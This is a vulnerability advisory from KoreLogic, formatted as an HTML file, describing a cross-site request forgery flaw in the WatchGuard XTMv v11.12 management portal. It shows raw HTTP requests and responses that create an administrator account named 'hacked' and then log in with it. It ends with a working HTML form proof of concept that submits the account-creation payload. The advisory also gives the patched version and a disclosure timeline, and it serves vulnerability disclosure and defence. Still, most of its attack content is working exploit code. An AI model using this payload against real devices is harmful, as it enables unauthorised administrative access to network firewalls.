1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173 | <!--
KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery
Title: WatchGuard XTMv User Management Cross-Site Request Forgery
Advisory ID: KL-001-2017-004
Publication Date: 2017.03.10
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-004.txt
1. Vulnerability Details
Affected Vendor: WatchGuard
Affected Product: XTMv
Affected Version: v11.12 Build 516911
Platform: Embedded Linux
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF)
Impact: Privileged Access
Attack vector: HTTP
2. Vulnerability Description
Lack of CSRF protection in the Add User functionality of the
XTMv management portal can be leveraged to create arbitrary
administrator-level accounts.
3. Technical Description
As observed below, no CSRF token is in use when adding a new
user to the management portal.
POST /put_data/ HTTP/1.1
Host: 1.3.3.7:8080
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 365
Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287
DNT: 1
Connection: close
{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked","domain":"Firebox-DB","role":"Device
Administrator","hash":"hacked","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}
The HTTP response indicates that the changes were successful.
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
Content-Length: 68
Expires: Sun, 28 Jan 2007 00:00:00 GMT
Vary: Accept-Encoding
Server: CherryPy/3.6.0
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Date: Sat, 10 Dec 2016 18:08:22 GMT
Content-Type: application/json
Set-Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287; expires=Sat, 10 Dec 2016 19:08:22 GMT; httponly;
Path=/; secure
Connection: close
{"status": true, "message": ["The changes were saved successfully"]}
Now, the newly created backdoor account can be accessed.
POST /agent/login HTTP/1.1
Host: 1.3.3.7:8080
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Content-Length: 414
Cookie: sessionid=515F007C5BD062C2122008544DB127F80000000C; session_id=0a3d24668f5c3b2c7ba7016d179f5f574e1aaf53
DNT: 1
Connection: close
<methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>hacked</string></value></member><member><name>user</name><value><string>hacked</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall>
The response below shows the application issuing an authenticated
session cookie.
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
Content-type: text/xml
Set-Cookie: sessionid=74B0DC5119495CFF2AE8944A625558EC00000008;secure;HttpOnly
Connection: close
Date: Sat, 10 Dec 2016 19:55:26 GMT
Server: none
Content-Length: 751
<?xml version="1.0"?>
<methodResponse>
<params>
<param>
<value>
<struct>
<member><name>sid</name><value>74B0DC5119495CFF2AE8944A625558EC00000008</value></member>
<member><name>response</name><value></value></member>
<member>
<name>readwrite</name>
<value><struct>
<member><name>privilege</name><value>2</value></member>
<member><name>peer_sid</name><value>0</value></member>
<member><name>peer_name</name><value>error</value></member>
<member><name>peer_ip</name><value>0.0.0.0</value></member>
</struct></value>
</member>
</struct>
</value>
</param>
</params>
</methodResponse>
4. Mitigation and Remediation Recommendation
The vendor has remediated this vulnerability in WatchGuard
XTMv v11.12.1. Release notes and upgrade instructions are
available at:
https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_12_1/index.html
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc. and Joshua Hardin.
6. Disclosure Timeline
2017.01.13 - KoreLogic sends vulnerability report and PoC to
WatchGuard.
2017.01.13 - WatchGuard acknowledges receipt of report.
2017.01.23 - WatchGuard informs KoreLogic that the
vulnerability will be addressed in the forthcoming
v11.12.1 firmware, scheduled for general
availability on or around 2017.02.21.
2017.02.22 - WatchGuard releases v11.12.1.
2017.03.10 - KoreLogic public disclosure.
7. Proof of Concept
-->
<html>
<body>
<form action="https://1.3.3.7:8080/put_data/" method="POST" enctype="text/plain">
<input type="hidden"
name="{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked3","domain":"Firebox-DB","role":"Device Administrator","hash":"hacked3","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}"
value="" />
<input type="submit" value="Trigger" />
</form>
</body>
</html>
<!--
The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->
|